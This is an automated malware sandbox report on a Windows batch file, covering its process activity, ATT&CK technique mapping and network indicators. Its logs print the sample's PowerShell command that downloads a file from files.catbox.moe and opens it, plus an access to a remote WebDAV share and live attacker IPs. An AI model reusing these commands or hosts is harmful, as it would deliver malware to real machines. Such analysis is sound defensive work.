Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4591Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5262Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 6836Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep count: 4591 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep count: 5262 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7356Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000007.00000002.2908979906.0000016F4A641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2909013236.0000016F4A654000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.2908205822.0000016F4502B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\u43g9t.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\cmd.exeFile opened: \\54.39.248.66@5000\DavWWWRootJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\54.39.248.66@5000\DavWWWRoot\Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
PowerShell
1
Scripting
11
Process Injection
11
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584191 Sample: sHCznAai4a.bat Startdate: 04/01/2025 Architecture: WINDOWS Score: 52 42 AI detected suspicious sample 2->42 9 cmd.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        process3 dnsIp4 44 Suspicious powershell command line found 9->44 15 cmd.exe 4 2 9->15         started        19 conhost.exe 9->19         started        34 127.0.0.1 unknown unknown 12->34 signatures5 process6 dnsIp7 36 54.39.248.66 OVHFR Canada 15->36 38 Suspicious powershell command line found 15->38 40 Opens network shares 15->40 21 Acrobat.exe 20 76 15->21         started        23 powershell.exe 14 16 15->23         started        26 conhost.exe 15->26         started        signatures8 process9 dnsIp10 28 AcroCEF.exe 107 21->28         started        32 108.181.20.35 ASN852CA Canada 23->32 process11 process12 30 AcroCEF.exe 2 28->30         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
sHCznAai4a.bat0%ReversingLabs
sHCznAai4a.bat3%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://g.live.com/odclientsettings/Prod.C:edb.log.7.drfalse
    high
    http://crl.ver)svchost.exe, 00000007.00000002.2908940152.0000016F4A600000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
        high
        https://g.live.com/odclientsettings/ProdV2.C:edb.log.7.drfalse
          high
          https://g.live.com/odclientsettings/ProdV2edb.log.7.drfalse
            high
            https://files.catbox.moe/u43g9t.pdfsHCznAai4a.batfalse
              high
              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000007.00000003.1721905010.0000016F4A8C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                high
                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000007.00000003.1721905010.0000016F4A8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  108.181.20.35
                  unknownCanada
                  852ASN852CAfalse
                  54.39.248.66
                  unknownCanada
                  16276OVHFRtrue
                  IP
                  127.0.0.1
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1584191
                  Start date and time:2025-01-04 15:37:07 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 18s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:15
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:sHCznAai4a.bat
                  renamed because original name is a hash value
                  Original Sample Name:b91d2640c2972bbbe94014406a07695a.bat
                  Detection:MAL
                  Classification:mal52.spyw.winBAT@24/57@0/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .bat
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 23.56.252.213, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 2.16.168.105, 2.16.168.107, 172.64.41.3, 162.159.61.3, 23.56.254.164, 199.232.214.172, 23.209.209.135, 2.19.126.149, 2.19.126.143, 23.200.0.21, 23.200.0.33, 192.168.2.4, 4.175.87.197, 23.195.92.153, 13.107.246.45
                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  TimeTypeDescription
                  09:37:57API Interceptor24x Sleep call for process: powershell.exe modified
                  09:38:03API Interceptor2x Sleep call for process: svchost.exe modified
                  09:38:15API Interceptor3x Sleep call for process: AcroCEF.exe modified
                  09:38:23API Interceptor1x Sleep call for process: cmd.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                  • files.catbox.moe/p1yr9i.pdf
                  SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                  • files.catbox.moe/nzct1p
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  OVHFRfuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                  • 51.195.5.52
                  fuckunix.arm.elfGet hashmaliciousMiraiBrowse
                  • 217.182.72.80
                  Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                  • 8.33.192.100
                  1.elfGet hashmaliciousUnknownBrowse
                  • 151.80.39.185
                  armv5l.elfGet hashmaliciousMiraiBrowse
                  • 54.39.164.223
                  http://www.escudier-sas.frGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                  • 145.239.37.162
                  hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                  • 54.37.137.114
                  file.exeGet hashmaliciousXmrigBrowse
                  • 51.222.200.133
                  https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                  • 54.38.113.4
                  NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousXmrigBrowse
                  • 51.222.200.133
                  ASN852CAFantazy.arm7.elfGet hashmaliciousMiraiBrowse
                  • 198.53.124.239
